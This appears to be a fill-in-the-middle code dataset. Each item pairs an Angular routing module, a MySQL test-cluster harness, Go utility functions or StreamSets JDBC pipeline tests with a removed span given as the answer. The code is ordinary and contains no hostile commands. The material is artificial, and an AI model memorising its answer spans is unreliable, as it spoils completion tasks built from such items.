app-routing.module.ts | import { NgModule } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { NavbarComponent } from './shared/navbar/navbar.component';
import { FirstComponent } from './shared/first/first.component';
const routes: Routes = [
{path:'',redirectTo:'first',pathMatch:'full'},
{path:'first',component:FirstComponent}
];
@NgModule({
imports: [RouterModule.forRoot(routes)],
exports: [RouterModule]
})
export class | { }
| AppRoutingModule |
mysql.py | #!/usr/bin/env python3
from tiden.apps.app import App
from tiden.apps.nodestatus import NodeStatus
from tiden.util import *
class Mysql(App):
tmp_pwd_log_tag = "A temporary password is generated for root@localhost:"
account_tmpl = [
"CREATE USER '__USER__'@'__HOST__' IDENTIFIED BY '__PWD__';",
"GRANT ALL PRIVILEGES ON *.* TO '__USER__'@'__HOST__' WITH GRANT OPTION;"
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.app_type = 'mysql'
self.init_file = None
self.username = None
self.password = None
self.mysql_home = None
if self.config.get('rt'):
self.mysql_home = "%s/%s" % (self.config['rt']['remote']['test_module_dir'], self.name)
mod_dir = self.config['rt']['remote']['test_module_dir']
self.killall_mysqld_mark = self.config['dir_prefix']
server_id = 1
port_start = 30000
servers_per_host = 1
if self.config['environment']['mysql'].get('servers_per_host') is not None:
servers_per_host = int(self.config['environment']['mysql']['servers_per_host'])
for host in self.config['environment']['mysql']['server_hosts']:
for x in range(0, servers_per_host):
self.nodes[server_id] = {
'host': host,
'server_id': server_id,
'data_dir': "%s/data.%s" % (self.mysql_home, server_id),
'log_dir': "%s/mysql.server.%s.logs" % (mod_dir, server_id)
}
server_id += 1
def setup(self):
prepare_dirs = {}
self.mysql_home = "%s/%s" % (self.config['rt']['remote']['test_module_dir'], self.name)
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not prepare_dirs.get(host):
prepare_dirs[host] = []
self.nodes[server_id]['status'] = NodeStatus.NEW
prepare_dirs[host].extend(
[
"ln -s %s %s" % (
self.config['artifacts'][self.name]['remote_path'],
self.mysql_home
),
'mkdir %s' % self.nodes[server_id]['data_dir'],
'mkdir %s' % self.nodes[server_id]['log_dir']
]
)
server_id += 1
self.ssh.exec(prepare_dirs)
def init_db(self):
init = {}
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not init.get(host):
init[host] = []
init[host].extend(
[
'cd %s; bin/mysqld --defaults-file=%s --initialize-insecure' % (
self.mysql_home,
self.nodes[server_id]['config']
)
]
)
server_id += 1
self.ssh.exec(init)
def check_requirements(self):
self.require_artifact('mysql')
self.require_environment('mysql')
def teardown(self):
self.killall()
def start(self):
start_cmd = {}
pid_cmd = {}
log_print('Start MySQL server(s)')
server_options = ''
if self.init_file:
server_options += " --init-file=%s" % self.init_file
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not start_cmd.get(host):
start_cmd[host] = []
pid_cmd[host] = []
self.nodes[server_id]['status'] = NodeStatus.STARTING
start_cmd[host].extend(
[
"cd %s; nohup bin/mysqld --defaults-file=%s -D%s;" % (
self.mysql_home,
self.nodes[server_id]['config'],
server_options
),
]
)
pid_cmd[host].extend(
[
"cat %s/mysqld.pid | awk '{print %s, $1}'" % (
self.nodes[server_id]['data_dir'],
server_id
)
]
)
self.ssh.exec(start_cmd)
res = self.ssh.exec(pid_cmd)
for host in res.keys():
lines = res[host]
for line in lines:
for server_id in self.nodes.keys():
m = search('^' + str(server_id) + ' ([0-9]+)$', line.rstrip())
if m:
self.nodes[server_id]['pid'] = m.group(1)
self.nodes[server_id]['status'] = NodeStatus.STARTED
log_print('MySQL server %s started on %s, pid %s' % (server_id, host, m.group(1)))
def stop(self):
log_print('Stop MySQL server(s)')
cmd = {}
wait_cmd = {}
killing_server_num = 0
for server_id in self.nodes.keys():
if self.nodes[server_id]['status'] == NodeStatus.STARTED:
host = self.nodes[server_id]['host']
if not cmd.get(host):
cmd[host] = []
wait_cmd[host] = []
cmd[host].extend(
[
"nohup kill %s & 2>&1 >> %s/mysql.kill.log" % (
self.nodes[server_id]['pid'], self.config['rt']['remote']['test_dir']
)
]
)
wait_cmd[host].extend(
[
"ps -p %s | grep -c mysql" % (
self.nodes[server_id]['pid']
)
]
)
self.nodes[server_id]['status'] = NodeStatus.KILLING
killing_server_num += 1
self.ssh.exec(cmd)
started = int(time())
timeout_counter = 0
while timeout_counter < 60:
res = self.ssh.exec(wait_cmd)
cur_killed_server_num = 0
for host in res.keys():
for line in res[host]:
if line.rstrip() == '0':
cur_killed_server_num += 1
log_put("Wait for stopped MySQL servers %s/%s in %s/%s sec:" %
(
cur_killed_server_num,
killing_server_num,
timeout_counter,
60
)
)
if cur_killed_server_num == killing_server_num:
log_put("MySQL servers stopped in %s sec:" % timeout_counter)
break
sleep(2)
timeout_counter = int(time() - started)
log_print()
def set_account(self, username, pwd):
accounts_stmts = []
for host in (self.config['environment']['mysql']['server_hosts'] + ['127.0.0.1', 'localhost']):
for line in self.account_tmpl:
accounts_stmts.append(
"%s\n" % line.replace('__HOST__', host).replace('__USER__', username).replace('__PWD__', pwd)
)
accounts_file = "%s/set_accounts.sql" % self.config['rt']['test_resource_dir']
with open(accounts_file, 'w') as w:
w.writelines(accounts_stmts)
self.ssh.upload_for_hosts(
self.config['environment']['mysql']['server_hosts'],
[accounts_file],
self.config['rt']['remote']['test_dir']
)
self.init_file = "%s/set_accounts.sql" % self.config['rt']['remote']['test_dir']
self.username = username
self.password = pwd
def change_master(self, master_id, slave_id):
cmds = {
self.nodes[slave_id]['host']: [
"echo \"CHANGE MASTER TO "
"MASTER_HOST='%s', "
"MASTER_USER='%s', "
"MASTER_PASSWORD='%s', "
"MASTER_PORT=%s;\" > "
"%s/change_master.sql" % (
self.nodes[master_id]['host'],
self.username,
self.password,
self.nodes[master_id]['port'],
self.config['rt']['remote']['test_dir'],
),
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
" < %s/change_master.sql" % (
self.mysql_home,
self.username,
self.password,
self.nodes[slave_id]['port'],
self.config['rt']['remote']['test_dir']
)
]
}
res = self.ssh.exec(cmds)
def reset_master(self, master_id):
cmd = {
self.nodes[master_id]['host']: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
"--execute='%s'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[master_id]['port'],
'RESET MASTER;'
)
]
}
res = self.ssh.exec(cmd)
def start_slave(self, slave_id):
cmds = {
self.nodes[slave_id]['host']: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
"--execute='START SLAVE;'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[slave_id]['port'],
)
]
}
res = self.ssh.exec(cmds)
def get_node(self, id):
return self.nodes[id]
def | (self):
nodes = {}
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not nodes.get(host):
nodes[host] = server_id
return list(nodes.values())
def exec_statement(self, node_id, stmt):
rs = []
host = self.nodes[node_id]['host']
cmd = {
host: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s -E "
"--execute='%s;'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[node_id]['port'],
stmt
)
]
}
res = self.ssh.exec(cmd)
row_idx = 1
cur = None
for line in res[host][0].split('\n'):
if line.startswith('*') and str("* %s. row *" % row_idx) in line:
if cur is not None:
rs.append(cur)
row_idx += 1
cur = {}
elif ':' in line and row_idx > 1:
sep_idx = line.find(':')
if sep_idx > 0:
cur[line[0:sep_idx].strip()] = line[sep_idx + 1:].strip()
if cur is not None:
rs.append(cur)
return rs
def killall(self):
get_pid_cmd = ["ps ax | grep '%s'" % self.killall_mysqld_mark]
raw_pid_data = self.ssh.exec(get_pid_cmd)
kill_cmd = {}
for host in raw_pid_data.keys():
for line in raw_pid_data[host][0].split('\n'):
m = search('^([0-9]+)\s+', line.strip())
if m and 'mysqld' in line:
pid = m.group(0)
if kill_cmd.get(host) is None:
kill_cmd[host] = []
kill_cmd[host].append('kill -9 %s; sleep 1;' % pid)
if len(kill_cmd) > 0:
self.ssh.exec(kill_cmd)
started = int(time())
timeout_counter = 0
while timeout_counter < 60:
raw_pid_data = self.ssh.exec(get_pid_cmd)
cur_running_server_num = 0
for host in raw_pid_data.keys():
for line in raw_pid_data[host][0].split('\n'):
if 'mysqld' in line and self.killall_mysqld_mark in line:
cur_running_server_num += 1
log_put(
"Wait for killed MySQL servers, still running %s, %s/%s sec:" % (
cur_running_server_num,
timeout_counter,
60
))
if cur_running_server_num == 0:
log_put("MySQL servers killed in %s sec:" % timeout_counter)
break
sleep(2)
timeout_counter = int(time() - started)
log_print()
| get_non_collocated_nodes |
utils.go | package utils
import "fmt"
func Min(first int, rest ...int) int {
if len(rest) == 0 |
m := first
for _, n := range rest {
if n < m {
m = n
}
}
return m
}
func Max(first int, rest ...int) int {
if len(rest) == 0 {
return first
}
m := first
for _, n := range rest {
if n > m {
m = n
}
}
return m
}
func AnsiRed(s string) string {
return fmt.Sprintf("\u001b[31m%s\u001b[0m", s)
}
func AnsiGreen(s string) string {
return fmt.Sprintf("\u001b[32m%s\u001b[0m", s)
}
func AnsiUnderline(s string) string {
return fmt.Sprintf("\u001b[4m%s\u001b[0m", s)
}
func AnsiBGRed(s string) string {
return fmt.Sprintf("\u001b[41m%s\u001b[0m", s)
}
| {
return first
} |
test_jdbc_stages.py | # Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import logging
import math
import os
import random
import string
import tempfile
import time
from collections import OrderedDict
import pytest
import sqlalchemy
import datetime
from streamsets.sdk.utils import Version
from streamsets.testframework.environments.databases import Db2Database, OracleDatabase, SQLServerDatabase, PostgreSqlDatabase
from streamsets.testframework.markers import credentialstore, database, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
ROWS_IN_DATABASE = [
{'id': 1, 'name': 'Dima'},
{'id': 2, 'name': 'Jarcec'},
{'id': 3, 'name': 'Arvind'}
]
ROWS_TO_UPDATE = [
{'id': 2, 'name': 'Eddie'},
{'id': 4, 'name': 'Jarcec'}
]
LOOKUP_RAW_DATA = ['id'] + [str(row['id']) for row in ROWS_IN_DATABASE]
RAW_DATA = ['name'] + [row['name'] for row in ROWS_IN_DATABASE]
DEFAULT_DB2_SCHEMA = 'DB2INST1'
@database
def test_jdbc_multitable_consumer_origin_simple(sdc_builder, sdc_executor, database):
"""
Check if Jdbc Multi-table Origin can retrieve any records from a table.
Destination is Trash.
Verify input and output (via snapshot).
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{src_table_prefix}%'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
# Column names are converted to lower case since Oracle database column names are in upper case.
tuples_to_lower_name = lambda tup: (tup[0].lower(), tup[1])
rows_from_snapshot = [tuples_to_lower_name(list(record.field.items())[1])
for record in snapshot[pipeline[0].instance_name].output]
assert rows_from_snapshot == [('name', row['name']) for row in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_consumer_offset_resume(sdc_builder, sdc_executor, database):
|
@database
def test_jdbc_consumer_non_incremental_mode(sdc_builder, sdc_executor, database):
"""Ensure that the Query consumer works properly in non-incremental mode."""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
metadata = sqlalchemy.MetaData()
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Query Consumer')
origin.incremental_mode = False
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
trash = pipeline_builder.add_stage('Trash')
origin >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
origin >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
# Run the pipeline N times, it should always read the same
for i in range(3):
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
assert len(snapshot[origin].output) == len(ROWS_IN_DATABASE)
assert snapshot[origin].output[0].get_field_data('/id') == 1
assert snapshot[origin].output[1].get_field_data('/id') == 2
assert snapshot[origin].output[2].get_field_data('/id') == 3
# TLKT-249: Add wait_for_finished to get_status object
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
finally:
logger.info('Jdbc No More Data: Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_multitable_consumer_with_finisher(sdc_builder, sdc_executor, database):
"""
Test reading with Multi-table JDBC, output to trash.
Test some table names that start with numbers (SDC-5381).
Check if Pipeline Finished Executor works correctly.
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{src_table_prefix}%'}])
finisher = pipeline_builder.add_stage('Pipeline Finisher Executor')
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >= finisher
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
random.seed()
tables = []
metadata = sqlalchemy.MetaData()
try:
connection = database.engine.connect()
num_letters = 10
num_recs = 10
num_tables = 3
for i in range(0, num_tables):
if i % 2 == 1:
# table name starts with a number, contains mixed-case letters.
input_name = '{}_{}_{}'.format(str(i), src_table_prefix,
get_random_string(string.ascii_lowercase, num_letters))
else:
# table name comprised of mixed-case letters only.
input_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, num_letters))
tables.append(sqlalchemy.Table(
input_name,
metadata,
sqlalchemy.Column('serial', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('data', sqlalchemy.Integer)
))
tables[i].create(database.engine)
rows = [{'serial': j, 'data': random.randint(0, 2100000000)} for j in range(1, num_recs + 1)]
connection.execute(tables[i].insert(), rows)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
finally:
for table in tables:
table.drop(database.engine)
# SDC-11009: Run away pipeline runners in JDBC Multithread origins when no-more-data generation delay is configured
@database
@sdc_min_version('3.2.0')
def test_jdbc_multitable_consumer_with_no_more_data_event_generation_delay(sdc_builder, sdc_executor, database):
"""
Make sure that when a delayed no-more-data is being processed, the pipeline properly waits on the processing to
finish before stopping.
source >> trash
>= delay (only for no-more-data) >> trash
"""
src_table = get_random_string(string.ascii_lowercase, 6)
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.no_more_data_event_generation_delay_in_seconds = 1
jdbc_multitable_consumer.table_configs = [{"tablePattern": f'%{src_table}%'}]
trash = pipeline_builder.add_stage('Trash')
delay = pipeline_builder.add_stage('Delay')
delay.delay_between_batches = 10 * 1000
delay.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
trash_event = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
jdbc_multitable_consumer >= delay
delay >> trash_event
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
metadata = sqlalchemy.MetaData()
try:
connection = database.engine.connect()
table = sqlalchemy.Table(
src_table,
metadata,
sqlalchemy.Column('serial', sqlalchemy.Integer, primary_key=True)
)
table.create(database.engine)
rows = [{'serial': 1}]
connection.execute(table.insert(), rows)
# We start the pipeline
sdc_executor.start_pipeline(pipeline)
# We wait three seconds - one second for the no-more-data to be generated and then some buffer time
time.sleep(3)
# Then we try to stop the pipeline, now the pipeline should not stop immediately and should in-fact wait
sdc_executor.stop_pipeline(pipeline).wait_for_stopped()
current_status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
assert current_status == 'STOPPED'
# Validate expected metrics
history = sdc_executor.get_pipeline_history(pipeline)
# Total number of input records
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
# 1 record, 1 no-more-data (rest of events is discarded)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 2
# The table itself contained only one record
assert history.latest.metrics.counter('stage.Trash_01.inputRecords.counter').count == 1
# Only no-more-data event should reach the destination
assert history.latest.metrics.counter('stage.Trash_02.inputRecords.counter').count == 1
# The max batch time should be slightly more then 10 (the delayed batch that we have caused)
# TODO: TLKT-167: Add access methods to metric objects
assert history.latest.metrics.timer('pipeline.batchProcessing.timer')._data.get('max') >= 10
finally:
if table is not None:
table.drop(database.engine)
def _get_random_name(database, prefix='', length=5):
"""Generate a random string to use as a database object name.
It handles letter case according to the database type, forcing upper-case (e.g. Oracle) or lower-case
(e.g. Postgres).
Args:
database: a :obj:`streamsets.testframework.environment.Database` object.
prefix: (:obj:`str`) add a prefix to the generated name. Default: ''.
length: (:obj:`int`) number of characters of the generated name (without counting ``prefix``).
"""
if isinstance(database, OracleDatabase):
name = '{}{}'.format(prefix.upper(), get_random_string(string.ascii_uppercase))
else:
name = '{}{}'.format(prefix.lower(), get_random_string(string.ascii_lowercase))
return name
def _create_table(table_name, database, schema_name=None):
"""Helper function to create a table with two columns: id (int, PK) and name (str).
Args:
table_name: (:obj:`str`) the name for the new table.
database: a :obj:`streamsets.testframework.environment.Database` object.
schema_name: (:obj:`str`, optional) when provided, create the new table in a specific schema; otherwise,
the default schema for the engine’s database connection is used.
Return:
The new table as a sqlalchemy.Table object.
"""
metadata = sqlalchemy.MetaData()
if type(database) == SQLServerDatabase:
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('name', sqlalchemy.String(32)),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True,
autoincrement=False),
schema=schema_name)
else:
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('name', sqlalchemy.String(32)),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
schema=schema_name)
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
return table
def _create_schema(schema_name, database):
"""Create a new schema in the database.
For RDBMs with no distinction between schema and database (e.g. MySQL), it creates a new database. For Oracle, it
creates a new user. For databases with schema objects, it creates a new schema.
Use ``_drop_schema()`` to remove schemas created by this function, to handle properly each case.
Args:
schema_name: (:obj:`str`) the schema name.
database: a :obj:`streamsets.testframework.environment.Database` object.
"""
if isinstance(database, OracleDatabase):
database.engine.execute('CREATE USER {user} IDENTIFIED BY {pwd}'.format(user=schema_name, pwd=schema_name))
database.engine.execute('GRANT CONNECT, RESOURCE TO {user}'.format(user=schema_name))
else:
schema = sqlalchemy.schema.CreateSchema(schema_name)
database.engine.execute(schema)
def _drop_schema(schema_name, database):
"""Remove a schema from the given database.
Args:
schema_name: (:obj:`str`) name of the schema to remove.
database: a :obj:`streamsets.testframework.environment.Database` object.
"""
if isinstance(database, OracleDatabase):
database.engine.execute('DROP USER {user} CASCADE'.format(user=schema_name))
else:
sqlalchemy.schema.DropSchema(schema_name)
@credentialstore
@database
def test_jdbc_lookup_processor(sdc_builder, sdc_executor, database):
"""Simple JDBC Lookup processor test.
Pipeline will enrich records with the 'name' by adding a field as 'FirstName'.
The pipeline looks like:
dev_raw_data_source >> jdbc_lookup >> trash
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(LOOKUP_RAW_DATA))
jdbc_lookup = pipeline_builder.add_stage('JDBC Lookup')
query_str = f"SELECT name FROM {table_name} WHERE id = '${{record:value('/id')}}'"
column_mappings = [dict(dataType='USE_COLUMN_TYPE',
columnName='name',
field='/FirstName')]
jdbc_lookup.set_attributes(sql_query=query_str,
column_mappings=column_mappings)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> jdbc_lookup >> trash
pipeline = pipeline_builder.build(title='JDBC Lookup').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
LOOKUP_EXPECTED_DATA = copy.deepcopy(ROWS_IN_DATABASE)
for record in LOOKUP_EXPECTED_DATA:
record.pop('id')
record['FirstName'] = record.pop('name')
try:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
rows_from_snapshot = [{list(record.field.keys())[1]: list(record.field.values())[1].value}
for record in snapshot[jdbc_lookup].output]
assert rows_from_snapshot == LOOKUP_EXPECTED_DATA
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_tee_processor(sdc_builder, sdc_executor, database):
"""Simple JDBC Tee processor test.
Pipeline will insert records into database and then pass generated database column 'id' to fields.
The pipeline looks like:
dev_raw_data_source >> jdbc_tee >> trash
"""
if isinstance(database, OracleDatabase):
pytest.skip('JDBC Tee Processor does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('JDBC Tee Processor does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(RAW_DATA))
jdbc_tee = pipeline_builder.add_stage('JDBC Tee')
# Note that here ids are not inserted. Database generates them automatically.
field_to_column_mapping = [dict(columnName='name',
dataType='USE_COLUMN_TYPE',
field='/name',
paramValue='?')]
generated_column_mappings = [dict(columnName='id',
dataType='USE_COLUMN_TYPE',
field='/id')]
jdbc_tee.set_attributes(default_operation='INSERT',
field_to_column_mapping=field_to_column_mapping,
generated_column_mappings=generated_column_mappings,
table_name=table_name)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> jdbc_tee >> trash
pipeline = pipeline_builder.build(title='JDBC Tee').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
# Verify the JDBC Tee processor has got new ids which were generated by database.
rows_from_snapshot = [{list(item.field.keys())[0]: list(item.field.values())[0].value,
list(item.field.keys())[1]: int(list(item.field.values())[1].value)}
for item in snapshot[jdbc_tee].output]
assert rows_from_snapshot == ROWS_IN_DATABASE
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@pytest.mark.parametrize('use_multi_row', [True, False])
@sdc_min_version('3.0.0.0') # stop_after_first_batch
def test_jdbc_tee_processor_multi_ops(sdc_builder, sdc_executor, database, use_multi_row):
"""JDBC Tee processor with multiple operations
Pipeline will delete/update/insert records into database with one batch and then update 'id'
field if it is inserted. The 'operation' field is used for the record header sdc.operation.type
which defines the CRUD operation (1: Insert, 2: Delete, 3: Update). The pipeline looks like:
dev_raw_data_source >> expression evaluator >> jdbc_tee >> trash
"""
if isinstance(database, OracleDatabase):
pytest.skip('JDBC Tee Processor does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('JDBC Tee Processor does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
pipeline_builder = sdc_builder.get_pipeline_builder()
DATA = [
{'operation': 2, 'name': 'Jarcec', 'id': 2}, # delete
{'operation': 3, 'name': 'Hari', 'id': 3}, # update
{'operation': 1, 'name': 'Eddie'} # insert, id will be added by JDBC Tee
]
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON',
raw_data='\n'.join(json.dumps(rec) for rec in DATA),
stop_after_first_batch=True)
HEADER_EXPRESSIONS = [dict(attributeToSet='sdc.operation.type',
headerAttributeExpression="${record:value('/operation')}")]
expression_evaluator = pipeline_builder.add_stage('Expression Evaluator')
expression_evaluator.header_attribute_expressions = HEADER_EXPRESSIONS
FIELD_TO_COLUMN = [dict(columnName='name', field='/name', paramValue='?')]
jdbc_tee = pipeline_builder.add_stage('JDBC Tee')
jdbc_tee.set_attributes(default_operation='INSERT',
field_to_column_mapping=FIELD_TO_COLUMN,
generated_column_mappings=[dict(columnName='id', field='/id')],
table_name=table_name,
use_multi_row_operation=use_multi_row)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> expression_evaluator >> jdbc_tee >> trash
pipeline_title = 'JDBC Tee MultiOps MultiRow' if use_multi_row else 'JDBC Tee MultiOps SingleRow'
pipeline = pipeline_builder.build(title=pipeline_title).configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
table = _create_table(table_name, database)
try:
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
# Passing only names to get the correct sequence numbers esp. PostgreSQL
if type(database) == SQLServerDatabase:
connection.execute(table.insert(), [{'id': row['id'], 'name': row['name']} for row in ROWS_IN_DATABASE])
else:
connection.execute(table.insert(), [{'name': row['name']} for row in ROWS_IN_DATABASE])
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline,
start_pipeline=True).snapshot
sequence_id = len(ROWS_IN_DATABASE)
# Verify the database is updated.
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
expected_data = [(row['name'], row['id']) for row in ROWS_IN_DATABASE]
for record in DATA:
if record['operation'] == 1: # insert
sequence_id += 1
expected_data.append((record['name'], sequence_id))
elif record['operation'] == 2: # delete
expected_data = [row for row in expected_data if row[1] != record['id']]
elif record['operation'] == 3: # update
expected_data = [row if row[1] != record['id'] else (record['name'], row[1]) for row in expected_data]
assert data_from_database == expected_data
# Verify the JDBC Tee processor has the new ID which were generated by database.
jdbc_tee_output = snapshot[jdbc_tee].output
name_id_from_output = [(record.field['name'], record.field['id']) for record in jdbc_tee_output]
assert name_id_from_output == [('Jarcec', 2), ('Hari', 3), ('Eddie', sequence_id)]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_query_executor(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(RAW_DATA) - 1)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.14.0') # multiple queries execution
def test_jdbc_query_executor_multiple_queries(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test.
